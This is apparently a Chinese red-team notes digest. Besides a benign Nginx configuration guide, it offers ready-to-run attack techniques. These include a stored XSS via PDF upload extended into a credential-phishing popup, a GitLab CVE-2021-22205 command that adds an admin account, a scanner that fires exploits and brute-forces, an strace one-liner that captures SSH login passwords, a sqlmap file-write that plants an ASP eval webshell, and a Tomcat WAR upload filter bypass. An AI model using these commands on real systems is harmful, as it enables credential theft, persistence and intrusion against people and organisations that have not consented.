Quan


WEB安全 内网安全 终端对抗 威胁情报
WEB安全
利用上传pdf的功能完成存储型XSS

作者说这是个水洞的好方法,在我看来他确实有这方面的功效。但回来想跟进一下这个功能,看看能否扩充为一个钓鱼场景下的一个弹框,比如在浏览这个pdf前直接弹窗需要登录该系统,这样我们说不定就会获取某个人员的账号,并且域名与系统均是白的。当然,这需要一些JS手法,这是我目前的研究方向:利用XSS完成更高阶的后利用
总结:
1.水洞,用于甲方或领导让你必须挖出漏洞的场景
2.尝试水坑钓鱼


https://mp.weixin.qq.com/s/LCtio1IBVLejzz4Dwh9zdg
WEB安全
Nginx常见配置情况

主要想分享一下这几天配置这台Nginx反代服务器常用的一些代码片段,方便以后快速部署
1.301跳转
主要是有些Web Application不支持反代,会转圈
server {
    listen 80;
    server_name blog.tysec.cn;
   
    return 301 https://www.cnblogs.com/tysec;
}
2.反向代理服务器配置
可以达到不暴露IP地址,但主要是为了绑域名,方便访问网站。
server {
    listen 80;
    server_name tysec.cn;

    location / {
        proxy_pass 想要反代的IP地址;
    }
}
3.设置某个目录需要账号密码
这个需要两步,首先是得先配置账号密码
htpasswd -c /etc/nginx/.htpasswd username
之后会让你输入密码
接着在你要的server块下配置
location /static/downloads/{
        proxy_pass http://127.0.0.1:10000; #反代地址
        auth_basic "Restricted Content";
        auth_basic_user_file /etc/nginx/.htpasswd; #生成的密码文件
    }
4.接入HTTPS证书
首先申请,腾讯云可以申请免费的SSL证书,五十张,足够了
接着到Nginx下配置:
server {
    listen 443 ssl;
    server_name domain.com;
ssl_certificate rdomain.com_bundle.crt;  #相对路径,该证书文件必须在nginx.conf同目录下
     ssl_certificate_key domain.com.key; 
     ssl_session_timeout 5m;
     ssl_protocols TLSv1.2 TLSv1.3; 
     ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:HIGH:!aNULL:!MD5:!RC4:!DHE; 
     ssl_prefer_server_ciphers on;
    location / {
        proxy_pass http://127.0.0.1:10000;
    }
5.HTTP跳转HTTPS
server{
listen 80;
server_name www.redteam.wang redteam.wang;
return 301 https://$host$request_uri;
}
6.Nginx的日常操作
service nginx start #启动Nginx
service nginx stop #停止Nginx
nginx -t #检测配置文件是否正确
nginx -s reload #重载nginx配置文件


https://www.redteam.wang
WEB安全
GitLab的CVE-2021-22205,命令执行直接添加gitlab 管理员

gitlab-rails runner 'user = User.new; user.email = "test@example.com"; user.name = "test"; user.username = "test"; user.password = "password"; user.access_level="admin"; user.confirmed_at = Time.zone.now; user.save!'
如果是docker使用bin/rails runner


http://www.redteam.wang
WEB安全
无敌增强版EHole

一直以来我都觉得EHole这个工具的指纹有点老,也有点少。最近发现这个项目EHole-magic感觉瞬间来精神了,他对EHOLE这款工具增强了一些功能:
* 支持Hunter
* 指纹库大幅度提升
* 根据命中的指纹打对应的POC
* 爆破功能
加黑的两个是我觉得最赞的功能,也是我一直以来想做的。
后续可针对本次护网爆出来的漏洞,整理高可用的POC加入其中,更快更准的打点!


https://github.com/lemonlove7/EHole_magic/
WEB安全
聊聊那些红队攻击中的"奇技淫巧"

1.如何窃取Linux登录的账号密码
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &)
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log
2.不出网的Mssql注入(中文目录写webshell)
上传一个bat文件并执行
python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.bat
bat的内容为
echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp
3.Tomcat后台上传WAR包过滤该如何绕过
将文件后缀修改为xxx.w\\\ar


https://mp.weixin.qq.com/s?__biz=Mzg3NDk3NzMwNw==&mid=2247483836&idx=1&sn=f899bf5f453cff4517e8815b9ea16747